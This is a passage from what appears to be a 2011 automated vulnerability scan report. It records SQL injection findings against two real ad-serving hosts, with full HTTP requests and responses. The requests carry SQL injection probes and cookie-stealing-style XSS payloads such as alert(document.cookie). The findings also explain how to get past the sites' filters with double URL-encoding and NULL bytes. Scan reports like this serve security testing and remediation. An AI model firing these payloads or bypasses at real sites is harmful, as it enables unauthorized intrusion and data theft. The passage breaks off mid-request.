Set-cookie: dt=95,20110510142248,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dYZLW3wTXTJTvl5S9Pya;Path=/;
Set-cookie: C=oYZLW3w4P620caabaMRGZSf;Path=/;Expires=Mon, 24-Sep-2074 17:56:08 GMT;
Set-cookie: O=eYZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:08 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 154727442/1228549327/311497400/1394483737
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

Request 2

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=86545239817%20or%201%3d2--%20&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:48 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142248,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dYZLW3wJ6HYKwq9P705ba;Path=/;
Set-cookie: C=oYZLW3wmSVMSdaaba7WL19Hb;Path=/;Expires=Mon, 24-Sep-2074 17:56:08 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/1946258675/3304200488
x-internal-selected:
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

1.15. http://q1.checkm8.com/adam/detected [cat parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home'%20and%201%3d1--%20&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:46 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.24 ny-ad14
Set-cookie: dt=95,20110510142246,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dWZLW3w8K72Qxi20LLXba;Path=/;
Set-cookie: C=oWZLW3wW5PRYeaaba1Q9T9Kc;Path=/;Expires=Mon, 24-Sep-2074 17:56:06 GMT;
Set-cookie: O=eWZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:06 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 264862870/1338682980/3892610037/2817138338
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 3

...

Request 2

GET /adam/detected?cat=Philly.Home'%20and%201%3d2--%20&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:46 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142246,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dWZLW3wJ6HYKwuFV9NKba;Path=/;
Set-cookie: C=oWZLW3wmSVMSdaabaXO37PHc;Path=/;Expires=Mon, 24-Sep-2074 17:56:06 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/3684716779/2077893440
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 3

...

1.16. http://q1.checkm8.com/adam/detected [req parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The req parameter appears to be vulnerable to SQL injection attacks. The payloads 13762249'%20or%201%3d1--%20 and 13762249'%20or%201%3d2--%20 were each submitted in the req parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr13762249'%20or%201%3d1--%20&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:52 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: dt=95,20110510142252,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d2ZLW3wt9JXIwQPYZNza;Path=/;
Set-cookie: C=o2ZLW3w6RXLQdaabap02MJKb;Path=/;Expires=Mon, 24-Sep-2074 17:56:12 GMT;
Set-cookie: O=e2ZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:12 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 192485258/1266305813/2069149637/1447462706
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

Request 2

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr13762249'%20or%201%3d2--%20&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:53 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142253,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d3ZLW3wJ6HYKwv6L2N2ba;Path=/;
Set-cookie: C=o3ZLW3wmSVMSdaabaUWLKPHb;Path=/;Expires=Mon, 24-Sep-2074 17:56:13 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/1908304928/3108108257
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

1.17. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the tl request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=21675705&if=0&tl=1%2527&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; 530930_4_90495=1305036425755; vf=5

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:13:13 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_nYoliQQC
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=21675705&if=0&tl=1%2527%2527&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; 530930_4_90495=1305036425755; vf=5

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1412
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:13:13 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Thu, 10-May-2012 14:13:14 GMT; path=/
Set-Cookie: 530930_4_90495=1305036794140; domain=.contextweb.com; path=/
Set-Cookie: vf=6; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<IFRAME HEIGHT="90" WIDTH="728" SRC="http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html" VISIBLE="true" MARGINWIDTH
...[SNIP]...

1.18. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1'&pxy=670,265&cxy=865,527&dxy=865,527&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:10:58 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_MK5ySffp
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1''&pxy=670,265&cxy=865,527&dxy=865,527&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2548
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:10:58 GMT
Connection: close
Set-Cookie: V=RiC6i2pCL3Ub; domain=.contextweb.com; expires=Thu, 10-May-2012 14:10:58 GMT; path=/
Set-Cookie: 530930_3_90494=1305036658918; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript">\n'
+ 'var zflag_nid="1432"; var zflag_cid="1"; var zflag_sid="1"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9";\n'
+ '</scr
...[SNIP]...

1.19. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2Flogin.action%3FbeamBack%3D%252FviewTag.action&mrnd=13017817&if=0&tl=1&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300%00'&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/login.action?beamBack=%2FviewTag.action
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; FC1-WC=^53620_1_2TBaI; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.0; V=wOebwAz4UvVv; 530930_3_90494=1305036044955; vf=4

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:09:40 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_LOD8qZmJ
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.gather.com%2Flogin.action%3FbeamBack%3D%252FviewTag.action&mrnd=13017817&if=0&tl=1&pxy=169,100&cxy=1066,267&dxy=1066,267&tz=300%00''&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/login.action?beamBack=%2FviewTag.action
